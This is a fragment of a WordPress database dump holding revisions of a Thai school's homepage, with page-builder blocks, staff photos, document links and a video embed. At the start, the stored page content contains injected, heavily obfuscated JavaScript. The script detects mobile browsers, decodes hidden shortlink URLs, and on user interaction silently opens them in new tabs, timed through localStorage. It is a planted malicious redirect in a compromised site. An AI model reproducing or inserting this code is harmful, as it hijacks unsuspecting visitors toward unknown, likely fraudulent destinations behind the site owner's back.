\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 10:36:33','2025-07-15 03:36:33','',19,'http://watprato.ssk.in.th/?p=670',0,'revision','',0),
(672,1,'2025-07-15 10:37:51','2025-07-15 03:37:51','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":